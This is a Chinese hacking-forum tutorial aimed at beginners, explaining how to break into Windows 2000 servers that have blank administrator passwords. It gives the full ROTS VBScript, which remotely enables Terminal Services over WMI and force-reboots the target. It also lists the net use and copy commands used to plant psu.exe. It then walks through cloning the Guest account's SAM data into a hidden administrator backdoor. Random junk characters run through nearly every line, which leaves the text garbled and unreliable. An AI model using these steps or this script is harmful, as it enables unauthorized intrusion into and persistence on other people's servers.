|
一次简单的3389入侵过程 + R& B- V) h, O$ g
原创:caozhe(草哲)
7 y; F% j4 i, ~5 D. o来源:中国欲网技术论坛--草哲 * L9 j) c) P! ]& ] W
1 i* R# e) _& J. ]
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!
. q+ B/ `* [( J( l
1 c7 u! e# x9 s2 i4 q3 B$ U于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!
5 P1 t" G! F* p/ w. A要入侵,我建议你在win2000环境下来*作!- x% i7 A5 R6 `
% {' J4 N: Y2 B/ C& ?; v T9 E首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!. f4 {1 p" j5 T( p! P; e7 G8 \
扫描的X-Scan V2.3、WINNTAutoAttack、流光!: A- Y/ h1 E1 c# k
X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
/ T! K4 s- |; S# i f远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)
/ p! y: |4 u, Z8 w- J( A克隆帐户用个psu就可以了~!
7 g5 W) Y- G: m4 q/ i a9 n7 b1 D* r: }, l/ `' i* Y
OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
) R- W0 K6 k6 c1 E _4 z运行CMD(2000下的DOS),我们给它开终端!
/ F3 i" o. v: m p8 u4 b命令如下!) B- q0 z: u$ J2 i0 {) N
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
* l" _& x. g# t: L上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启). s7 R% R# g9 \ y
6 _4 d5 a* ~: [! |
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
i0 _) [$ o1 U, q. h
, p* G, ?$ L3 w一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
' A0 o8 D% H/ s" e安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!& i( Z: v" @! j3 [' Q& h& \2 V9 q# S' s3 O
, ^) f: m5 x9 e, Z7 p0 Z; [回到DOS下!我们建立IPC$连接!
5 S# R8 O" R' H6 ?6 A2 V0 gnet use \\120.0.0.1\ipc$ "" /user:"administrator"5 c8 U; X5 T! e- ?" v! ?: s
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
. r! `9 Y) A. ?' p$ Tcopy psu.exe \\120.0.0.1\admin$\system32" Z7 F _( e# G1 y0 R% W
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
4 _( P/ d4 h3 ^0 b3 m% @* F) I
1 A: ]) G, w3 f+ z3 H7 z假设guest用户被禁用,我们就是要利用guest做后门帐户!
" f# i: r' y9 p! I* i4 l, i2 O/ x在该服务器运行CMD,在命令行下输入, A& t( p l( E1 F: R' {
psu -p regedit -i PID
2 v8 y: F9 B/ U) X* S K' w; b7 C: F+ v, p
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!; ]' \3 d U5 g& S
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458- e* _/ d) A) N& d$ w, y
那么,命令就是这样5 S* n: |9 f! U. Z
psu -p regedit -i 5458
9 r0 o- ~9 H, R6 g. Z这样直接打开注册表,可以读取本地sam的信息。
3 o i( }* \; z打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users) ~$ F0 y' G1 U, I% K9 a! Y
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!" `: b3 z5 A+ \8 f
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names* ^. `# {: U" I- _/ }
查看administrator的类型,是if4,再看guest的是if5
$ Y' ?# P2 l, x4 g e) Q" t: T好了,知道了类型后,打开4 A/ U. L/ D3 x5 W/ z/ ?% }
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
0 P$ @8 r! _3 ^, ?/ P, v这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开* e5 i5 [! p" V0 I
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5" e! V5 w5 J* b# d- z
双击右侧的F,把刚复制的粘贴到里面!9 B+ d$ D0 R) f: q3 S1 f, H: V
' k7 S2 X& b7 z做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5+ L% q6 c0 D7 ^: U
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
! o4 ]% }1 _- R+ v3 R. t8 u这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
$ Q4 v- e+ Y% H* j/ |; O) H) ?( Y0 i: y$ B U/ ^
打开CMD,在命令行下输入 t! v$ {* b* s* x( h$ O3 f
net user guest password
( [& ~! D+ D" @- B) A这条命令是给guest设置密码,后面的password就是密码* |9 D7 w! a7 u
然后输入
+ e& B8 K9 T4 A* qnet user guest /active:y
# k1 ?* I) b9 N% r9 i* @* Y这命令是激活guest帐户,然后我们把他禁用7 q( u- g0 P$ S& r: i+ b0 _6 ]! Z
net user guest /active:n
* @; H) M/ K, _% O上面的三行命令必须在DOS下执行!
2 F3 V) D$ |1 g# ?2 I1 O7 k1 X) @4 c+ B: _5 V0 H! ^
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!
- K. ~9 o, w, Q4 o8 V& Q! m2 [6 |而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
3 J$ |1 _9 \- E& y+ C v8 i* O2 |* j# p4 L1 j
注销一下,用guest登陆吧!
9 U4 E' t9 J, i* R$ C
3 E4 J/ y5 M9 E3 T: s" ~打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!8 }4 Y; [9 e; h3 D6 f4 s& f% R
如果还有地方不明白的话,可以问我,我知道的一定告诉大家!9 ^& @7 _- L: X2 D( x
- A1 D) p! ~, M% z/ e因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!
1 Z1 Q4 _1 @- x/ z2 S. H1 b' [7 O2 E* |% y6 Y5 c
----------------------------------------------------------------------! K, \. y# Z, {2 V6 w
以下是开终端的脚本,把它存为*.vbe
8 r, j) q# o; s& q( Ron error resume next% m' Z) m+ x0 J% u# y
set outstreem=wscript.stdout
; _8 d$ t0 U0 O2 P1 }& I) ]( k" Fset instreem=wscript.stdin8 z7 s0 R9 c8 q! L& C" X0 }
if (lcase(right(wscript.fullname,11))="wscript.exe") then
9 j/ H- u" W: }( ~. e$ V- S8 G. N set objShell=wscript.createObject("wscript.shell")
( n" s" u) ?* C$ @( E* C0 ] objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
7 Z' V) T1 f+ P( p: J7 N' N- \ wscript.quit" s' E" E ?: A+ D K
end if
. J' |7 V L4 r+ oif wscript.arguments.count<3 then, n5 a( o! l' Z5 n; ~& {+ A
usage()$ d/ w( ?( \4 n6 o' Z
wscript.echo "Not enough parameters."
$ j3 n/ G1 B* P8 q wscript.quit7 v/ l- {7 w- X! u6 s
end if
5 A, p6 g" ?" o# n! Z* B* a1 @7 }: J! u$ d
ipaddress=wscript.arguments(0)
1 |1 y% ]" V. r# @+ r8 ~username=wscript.arguments(1)
! A8 u: n7 v$ P; E0 c6 Q+ b: Mpassword=wscript.arguments(2), `& }; T9 u, |2 F/ H
if wscript.arguments.count>3 then
4 W. ~; V7 I" L7 @9 i port=wscript.arguments(3)
7 L/ B8 x% G: E, O* Y O( X8 ]else
. N! g8 Y2 G: ]& x% } port=33895 P1 Z r+ \* q* n7 Q
end if1 Y1 _. U% Z- ^( _4 g8 ]/ J- m# y
if not isnumeric(port) or port<1 or port>65000 then
% Q# O, L7 T) K wscript.echo "The number of port is error.", b g h) k5 {" s/ X3 S; m: @
wscript.quit
1 z0 L t, C; M% zend if) T5 H ], A |
if wscript.arguments.count>4 then; |% q& O$ ?! X+ H* {
reboot=wscript.arguments(4)$ U* M1 M* E9 v4 J
else
6 D: R2 k% x1 N, r2 J reboot=""$ |2 {8 J, b" k7 Y5 ]# h) w7 D! r
end if7 h4 o ]% J8 ^; q W. D+ V. {
y6 S% B/ e1 u. b E& T
usage()
- I- R# N$ b1 goutstreem.write "Conneting "&ipaddress&" ...."( [1 E& [% \) C) m2 Z
set objlocator=createobject("wbemscripting.swbemlocator")' ?/ ]2 g0 w/ s' \$ {& p
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
1 Q# ^. i' y0 n& _1 _showerror(err.number)- h" u* G5 @- M% j
objswbemservices.security_.privileges.add 23,true0 y! h- R8 v. c. w& F$ @( T
objswbemservices.security_.privileges.add 18,true- [2 ]' }' m. M; I4 x* _$ S# p
; M* L2 J- R9 W0 v
outstreem.write "Checking OS type....") E% D0 C- S2 M( G* A
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")) ~3 C4 C' \! d' Z! p) r2 Z
for each objinstoscaption in colinstoscaption$ q9 `0 e1 g* f# u& P5 x- l
if instr(objinstoscaption.caption,"Server")>0 then
( |- s" {% ~' T' c+ \ wscript.echo "OK!"! m+ h Q* J* N% x
else
1 z- w1 O* y' `9 c wscript.echo "OS type is "&objinstoscaption.caption
" m2 s( `: K- q0 ^! C% _ outstreem.write "Do you want to cancel setup?[y/n]"% d: N& e* X5 d! U3 m% l4 [& L8 U
strcancel=instreem.readline
: a# V2 X- Z" n, W3 o* o if lcase(strcancel)<>"n" then wscript.quit
& D: `) a; Q8 G end if1 c6 V5 B* }0 l$ V3 {: d" r
next
" u4 R: g. `$ B* T8 l/ }
) }: ]1 S* U0 v4 b) i% houtstreem.write "Writing into registry ...."
1 {& S& H1 J1 W5 Tset objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")3 m; l# O$ N7 X
HKLM=&h80000002" L8 k+ B0 h1 e: t
HKU=&h80000003
4 B, L" t6 L) {: bwith objinstreg# Q5 Y2 B1 J1 G: o& ^9 F
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
& h; ~5 K# g, S.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
* y; v. N$ p! g.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
4 q9 r/ T0 @3 `& N' ].setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1* w' o0 J/ Z/ y# _" s5 U
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
& m2 Q& N3 x/ P.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
9 S: b9 h1 `, R3 ~.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",23 G, F, \9 z5 n5 |+ v0 C. o
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" ^2 D. V2 g! `8 c8 k$ l3 M
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
5 b S1 T" K, c5 ^end with
/ [5 {$ P$ ?5 `3 K8 kshowerror(err.number)
/ z& Q7 V5 }+ f3 `
! O. P+ A: r9 {$ y$ Trebt=lcase(reboot)
1 m6 }) ^6 M t, Mflag=0
s3 f* m& R- u) J6 nif rebt="/r" or rebt="-r" or rebt="\r" then flag=2
; x! r: [5 x0 l; m* S' P3 y# @$ wif rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6+ O) {2 s% d7 n' H3 m3 N
if flag<>0 then( M7 I( @; b, [3 |( Q
outstreem.write "Now, reboot target...."7 |7 t. n( }1 k9 _: t9 s, Z
strwqlquery="select * from win32_operatingsystem where primary='true'"
" \8 ?( S$ }& H% j, ^% h set colinstances=objswbemservices.execquery(strwqlquery)
, |7 A0 E4 S) `; d$ j& p1 K for each objinstance in colinstances
* U# S, ?4 f2 W" }0 _ objinstance.win32shutdown(flag)
0 f7 H: j: n* @4 a8 t! o' W next9 a9 ?7 H# y0 A
showerror(err.number)
+ ~: Q/ P* C2 [+ r# `4 Yelse
) y% _* |7 G0 I0 k. @ wscript.echo "You need to reboot target."&vbcrlf&"Then,"
9 T! d% y% \. A# T8 ^2 R; }5 nend if
7 z: N1 D& X" |4 A4 n2 l0 mwscript.echo "You can logon terminal services on "&port&" later. Good luck!"
% k* e; ?- I9 Q% T& o; Y" `! R/ C8 e" ^ b) z3 A. W
function showerror(errornumber)+ ^5 C, @# u9 y/ D) ? B j! V6 f
if errornumber Then1 s, i5 {0 ` r4 ]8 U9 G" ~ p. `1 O
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."- }- Y+ i* v9 {9 J% p5 ~
if err.description <> "" then" v- V' t2 g& N, @7 R9 p2 |
wscript.echo "Error description: "&err.description&"."
: I* a0 {0 P6 B* B5 Y$ g end if. u2 H a7 k7 o7 D; ]% U; v
wscript.quit0 f" W: Y1 R3 F# H3 \0 t$ J, B
else7 Z: k& J( K9 o7 d1 F
wscript.echo "OK!"- c8 d) Y% u- g- r+ g% ?2 ~. o
end if
9 Q" t! L9 ?) `3 B; lend function
) t" P& ~ J* P$ V7 t3 y5 e
$ f: e; |( y" n) M6 Ofunction usage()
" s; O5 w5 F4 q) r& c! wwscript.echo string(79,"*")
, ?( |/ W" M8 x" ]! K5 Iwscript.echo "ROTS v1.05"
" c, _+ T6 i/ l) N+ y( f, O5 Awscript.echo "Remote Open Terminal services Script, by 草哲"
: O7 _, H$ o7 L3 jwscript.echo "Welcome to visite www.5458.net"8 n1 W/ M+ k u% v4 G
wscript.echo "Usage:"0 ^7 _, s) @1 X0 Q4 T9 j
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"" F* z/ t1 r. S$ V9 Z ]( F v9 ?
wscript.echo "port: default number is 3389."
7 `' q" U- M0 @wscript.echo "/r: auto reboot target."
/ D0 {0 i: z2 s% ]9 R( y- s- ?( ewscript.echo "/fr: auto force reboot target.", v- J9 h8 E( e! o3 W' i
wscript.echo string(79,"*")&vbcrlf3 B; E+ i* h( P" ~1 Q
end function- ?- O5 u' ]$ {1 e
7 R1 I' I5 E: p, C7 t }转自安全焦点 |
|